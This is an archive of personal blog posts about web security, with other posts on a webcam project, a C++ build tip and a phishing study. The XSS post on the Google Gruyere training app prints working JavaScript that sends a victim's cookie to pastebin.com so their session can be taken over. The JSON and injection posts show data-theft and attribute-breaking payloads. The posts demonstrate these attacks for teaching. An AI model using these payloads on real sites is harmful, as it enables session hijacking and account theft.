The (lack of) security at PayPal

18 June, 2011 § 2 Comments

PayPal has had a tough week in the news. Earlier this week, a user claimed to have found a way to reset an arbitrary account’s password through the Forgot Password workflow. From his description, it sounded like a low-sophistication attack (i.e., something he stumbled upon rather than engineered).

Much of the reaction on Hacker News was to quickly remove your bank account from your PayPal account so that an attacker couldn’t steal your money.

When I saw the news, I quickly logged in to PayPal to remove my bank account. I had about $25 sitting in my PayPal account, so I decided to transfer the remaining funds to my bank account before disassociating it. Except it turns out that doing this locks the bank account association for three to four days.

In the meantime, I decided to update the primary email address on the account to one that I check more often. I typed in my newer email address, they sent me a confirmation to the new email address, and I was done. Wait… I was done? It was that easy?

They never gave my older email address an opportunity to cancel this new primary email address. I logged in to my older email account and saw an email from PayPal saying that my primary email address had been changed and if this was a problem to call them. Huh?

So not only can someone claim a way to get access to any PayPal account, they can also change the primary email address of the account without giving the owner any opportunity to stop it before it’s too late?

PayPal needs to make a lot of changes

There is no way that I can cover all of the things that PayPal should do to protect their customers, but I can suggest a few.

First, they need to give account owners an opportunity to guard themselves against people changing crucial account information. It shouldn’t be so easy to add/remove an email address from the account.

Second, they need to advertise their Security Key feature (aka two-step authentication) more prominently. I didn’t know that they had one until I started writing this blog post.

Third, they should set up a secret passphrase that is included in all emails from them. The bank that I use does this, and it is a very low-tech but successful way to know if an email is from a phishing scam.

Fourth, it turned out that the vulnerability the original user claimed wasn’t the vulnerability that had actually been found. PayPal doesn’t require you to confirm your email address before you can continue creating your account. Someone else signed up with this guy’s email address, and that is how he got access. None of this would have been news if PayPal required you to confirm your email address.

Last, PayPal needs to do a better job responding to these allegations. At the very least, let people know that you are looking into the issue.

XSS Prevention in GMail

28 February, 2011 § Leave a comment

Many popular web applications use JSON as their data interchange format. The format is very compact, easy for humans to read, and is based on a subset of JavaScript.

I’ll start by showing an example. Consider a website that wants its clients to query the server for the three most recent public messages. The client may send a GET request to the following address: https://mail.google.com/recent_messages/

The response can be written as follows:

var messages = [
   {"user": "foo", "m": "I like turtles", "t": 123423550},
   {"user": "bar", "m": "Turtle power!", "t": 1234543245},
   {"user": "baz", "m": "Cowabunga dude", "t": 1234567643}
];

When mail.google.com requests this JSON feed, it could then run eval() on the source code. Afterwards, it will have a messages object in global scope that it can reference.

This works out well for GMail, but it also allows other websites to make the same call. Modern web browsers will not allow asynchronous HTTP requests to cross domain boundaries, so it is easy to think this is safe. However, if the URL is added as the src attribute of a script tag, the browser will happily load and execute the content.
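To make the risk concrete, here is a sketch of what a malicious page could do against the unprotected response above (assuming the victim is logged in, so their cookies ride along with the request; the endpoint is the hypothetical one from the example):

// Sketch of the attack against the unprotected feed shown above. The
// attacking page injects a script tag pointing at the victim's JSON
// endpoint; the browser attaches the victim's cookies and then executes
// the response as JavaScript.
var s = document.createElement("script");
s.src = "https://mail.google.com/recent_messages/";
s.onload = function() {
  // The response declared "var messages = [...]" in global scope,
  // so the attacking page can now read the victim's data.
  console.log(messages);
};
document.body.appendChild(s);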

To work around this, GMail adds while(1); to the beginning of the JSON response.

When JavaScript is requested through a script tag’s src attribute, the DOM gives no access to the raw text of the response, so the while(1); cannot be stripped out before it runs. If an attacking page loads this JSON feed that way, its script will simply hang in the infinite loop.
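GMail’s own code, on the other hand, requests the feed with a same-origin XMLHttpRequest, so it can read the raw text, strip the prefix, and only then parse it. Here is a minimal sketch of that idea, built around the example response above (this is not GMail’s actual implementation):

// Minimal sketch of how the legitimate, same-origin client can consume
// the protected feed: read the raw text, strip the defensive prefix and
// the "var messages =" wrapper, then parse what's left as plain JSON.
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://mail.google.com/recent_messages/", true);
xhr.onload = function() {
  var body = xhr.responseText
    .replace(/^while\(1\);/, "")        // remove the anti-hijacking prefix
    .replace(/^\s*var messages =/, "")  // remove the assignment wrapper
    .replace(/;\s*$/, "");              // remove the trailing semicolon
  var messages = JSON.parse(body);      // what remains is valid JSON
  console.log(messages.length + " recent messages");
};
xhr.send();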

Pretty interesting, huh? There are still workarounds that can defeat this, such as setting up a server-side proxy that makes the request and strips off the while(1);.

If you’re looking for more details, Adobe Labs has a page on their website that covers Preventing the Execution of Unauthorized Script in JSON.

JavaScript Injection proof of concept

26 February, 2011 § Leave a comment

Following up from my previous post about XSS Session Hijacking in Google Gruyere, I decided to write a post covering a JavaScript injection vulnerability.

The color attribute on profiles lacks input validation and is thus susceptible to JavaScript injection. Simply put, this means that a user can edit their profile and insert code that will run on the computers of other users.

Some of the possible uses of this attack would be to:

  • Spam the user with advertisements
  • Increase visits to another website
  • Spread malware

In this proof of concept, I used the following as the “color” setting for my profile:

red' onmouseout='window.open("http://www.msu.edu/~weinjare/ad.html", "", "height=220,width=450");return false;

The onmouseout event handler launches a new popup window that could include spam. This code is executed when a visitor moves their mouse over my username and then off of it.

I’ll try to explain the payload above. The HTML that is generated for the page uses single quote characters to delimit attribute values. The single quote right after the word “red” closes the color value early, which allows arbitrary markup to be injected into the page. Everything that follows is treated as another attribute on the element: an onmouseout event handler that fires when the mouse moves onto the element and then leaves it.

Notice that the injected onmouseout value opens with a single quote but has no closing quote. That is deliberate: when the HTML is generated, the template appends the single quote that was meant to terminate the color value, so the closing quote is supplied for us and the generated HTML stays well-formed.
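Putting it together, the generated markup ends up shaped roughly like this (the actual element and attributes Gruyere emits may differ; this is only meant to show where the injected quote marks land):

<span style='color:red' onmouseout='window.open("http://www.msu.edu/~weinjare/ad.html", "", "height=220,width=450");return false;'>username</span>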

To show this in action, I created the following video:

XSS Session Hijacking proof of concept

17 February, 2011 § 6 Comments

I’ve been spending time lately playing with Google Gruyere. I first got introduced to it back when it was called Jarlsberg. After finding all the cross-site scripting vulnerabilities, I thought it would be cool to actually exploit them.

Until then, I had never actually exploited any of the holes I had found. When disclosing security vulnerabilities, I knew the potential impact a hole could carry; while it was easy to convince myself that a fix was necessary, I’ve learned it’s much harder to convince others. So I set out to implement a proof of concept for one of the holes in Google Gruyere.

Gruyere allows users to set a homepage link on their profile; however, the application doesn’t sanitize the input. Try the following as your homepage and you’ll get a nice alert dialog:

javascript:alert(1)

To exploit this, I wrote the following JavaScript:

function a() {
  // POST the current document's cookie to Pastebin's public paste API,
  // where the attacker can retrieve it later by searching for "XSS_poc".
  var xhr = new XMLHttpRequest();
  var params = 'paste_code=' + document.cookie + '&paste_name=XSS_poc';
  xhr.open("POST", "http://pastebin.com/api_public.php", true);
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhr.setRequestHeader("Content-length", params.length + "");
  xhr.setRequestHeader("Connection", "close");
  xhr.send(params);
}
a();

I then used the Google Closure Compiler to compress this JavaScript by over 18%, producing the following final code:

var a=new XMLHttpRequest,b="paste_code="+document.cookie+"&paste_name=XSS_poc";a.open("POST","http://pastebin.com/api_public.php",true);a.setRequestHeader("Content-type","application/x-www-form-urlencoded");a.setRequestHeader("Content-length",b.length+"");a.setRequestHeader("Connection","close");a.send(b);

Prefix the JavaScript code with `javascript:`, and you’re off to the races.

So how does this work? When executed, the JavaScript takes the document’s cookie and posts it to Pastebin. The attacker then visits pastebin.com and finds the cookie by searching for “XSS_poc”.

I then used a Google Chrome extension called Edit This Cookie to change my cookie to be that of the victim. Hitting Refresh on the page now showed that I was logged in as the victim :)

I recorded a video of the attack and have embedded it below. The music was created by Kevin MacLeod.

What do you think?

Weekend hacking: Homebrew security camera with infinite recording length

24 January, 2011 § 1 Comment

I’ve seen people use security cameras before. Most cameras are set up so that the user puts in a VHS tape, presses record, and repeats the process over and over. If something happened during the recording, the tape is saved as evidence; otherwise it is rewound and recorded over again.

This always seemed like a lot of work for something that is purely reactive. Look at the scenario again: the user is proactively doing a lot of work in the hope that they will be able to react. Put another way, if you make 20 dollars an hour, you might spend five or six hours a month rewinding tapes and pressing record; unless the tape catches more than 100 dollars’ worth of damage, it wasn’t worth it.

So how about a different solution? At midnight on Friday I decided I would find something better. I had in mind a security camera that kept a circular buffer of the last 8 or so hours. If nothing happened then it would just overwrite what it had previously recorded.

Unfortunately I had no luck finding such a program on the internet, so I decided to write one myself. I first came across OpenCV, a free computer vision library. OpenCV is really powerful, but it looked like a lot of work, and I sure didn’t want to write this in C++. Luckily I found technobabbler’s tutorial on how to make a simple webcam application using Python.

I followed the tutorial and had a simple application running that could save a snapshot from the webcam with a simple click of a button. By 4:30am I had a working prototype that was doing just what I wanted.

Using Python 2.5, VideoCapture, PIL, pygame, and FFmpeg, I am able to keep the last 24 hours of snapshots (at 10 frames per second). If I ever want to save those 24 hours for reference, I simply hit the ‘s’ key on the keyboard.
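The script itself is written in Python, but the bookkeeping at its heart is just a fixed-size buffer that overwrites its oldest entry once it wraps around. Here is a rough sketch of that idea (in JavaScript purely for illustration; the real source is linked below):

// Rough sketch of the circular-buffer idea, for illustration only.
// capacity = frames per second * seconds of history to keep.
function RingBuffer(capacity) {
  this.frames = new Array(capacity);
  this.next = 0; // index of the slot that will be overwritten next
}

RingBuffer.prototype.add = function(frame) {
  this.frames[this.next] = frame; // silently overwrite the oldest snapshot
  this.next = (this.next + 1) % this.frames.length;
};

// Return the snapshots in oldest-to-newest order, e.g. when the user
// presses 's' to keep the buffered footage for reference.
RingBuffer.prototype.save = function() {
  return this.frames
    .slice(this.next)
    .concat(this.frames.slice(0, this.next))
    .filter(function(frame) { return frame !== undefined; });
};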

I’ve made this script open-source under the GPL license and hosted it at Google Code. Let me know what you think.

Finding how a header file gets included

6 May, 2010 § 2 Comments

Have you ever had a header file that is not explicitly part of your Visual Studio solution generate warnings?

Recently I’ve been working on fixing static analysis warnings reported by PREfast, Microsoft’s static analysis tool for C++. I ran into an issue, though, with some of the Microsoft Windows SDK v6.0 headers. One file, aptly named `strsafe.h`, can be the cause of tons of warnings in a build.

I looked around and found that the Windows SDK team is fully aware of the problem. They recommend wrapping the include for strsafe.h with pragmas, like so:

#include <CodeAnalysis/warnings.h>
#pragma warning(push)
#pragma warning(disable: ALL_CODE_ANALYSIS_WARNINGS)
#include <strsafe.h>
#pragma warning(pop)

So the first thing I did was search through my code to find out what included strsafe.h. It turned out that no file explicitly included it, so I figured it must get pulled in by another header.

To find out what files are included in your build, you can turn on /showIncludes through Project Properties ➨ Configuration Properties ➨ C/C++ ➨ Advanced ➨ Show Includes.

/showIncludes prints a tree of all of the files that get included when the project is built. Using this, I was able to find which SDK headers we included that ended up pulling in strsafe.h.
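The output looks something like the following (the paths and the particular chain of headers here are made up for illustration). Each additional level of indentation after “including file:” means that the file was included by the file on the line above it:

Note: including file: C:\projects\myapp\precompiled.h
Note: including file:  C:\Program Files\Microsoft SDKs\Windows\v6.0\Include\shlobj.h
Note: including file:   C:\Program Files\Microsoft SDKs\Windows\v6.0\Include\strsafe.h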

The whole process took about a half hour: turning the compiler flag on, performing a rebuild, narrowing down the includes, and wrapping them with pragmas. Suppressing the warnings still leaves a bad taste in my mouth, but getting rid of them cut out a lot of noise surrounding actual warnings that are more pressing.

Why Phishing Works

30 April, 2009 § Leave a comment

I just read Why Phishing Works, a 2006 paper by Dhamija, Tygar, and Hearst about why phishing succeeds. Some of the notable comments in it come from participants in the usability study that the authors ran:

From users who looked at security indicators in website content only:

“I never look at the numbers and letters up there [in the address bar]. I’m not sure what they are supposed to say.”

From users who looked at content and domain name only:

Many did not know what an IP address was; they referred to one as a “redirector address”, a “router number”, an “ISP number”, or “those number thingies in front of the name.”

From users who looked at all of the above and also for HTTPS in the address:
  • One never noticed the padlock in the browser chrome.
  • One stated that favicons in address bars indicate authenticity better than a padlock because they “cannot be copied.”

From users who looked for a padlock icon:

Some participants gave more credence to padlock icons that appeared within the content of the page as opposed to the browser chrome.

Other notes from the reading:

One user mentioned that she verifies the authenticity of a website by trying to log in and seeing if it works. She said, “What’s the harm? Passwords are not dangerous to give out, like financial information.”

One of the last tests had the users look at a phishing site that was a direct copy of a real site. The site included an animated graphic of a bear and produced the following responses:

  • The “cute” design was taken as a convincing sign that the website was legitimate.
  • Two participants specifically mentioned the bear graphic, “because that would take a lot of effort to copy”.

Many found the animation appealing and reloaded the page multiple times just to see the animation again.

And last, but not least: when encountering a website with an invalid SSL certificate, the users accepted the warning and explained it away with quotes like these:

“I accepted the use of cookies”, “It asked me if I wanted to save my password on forms”, “It was a message from the website about spyware”

Interesting quotes. I’m not sure how to solve this problem. One approach could be to understand what users already assume to be secure and simply design towards that.
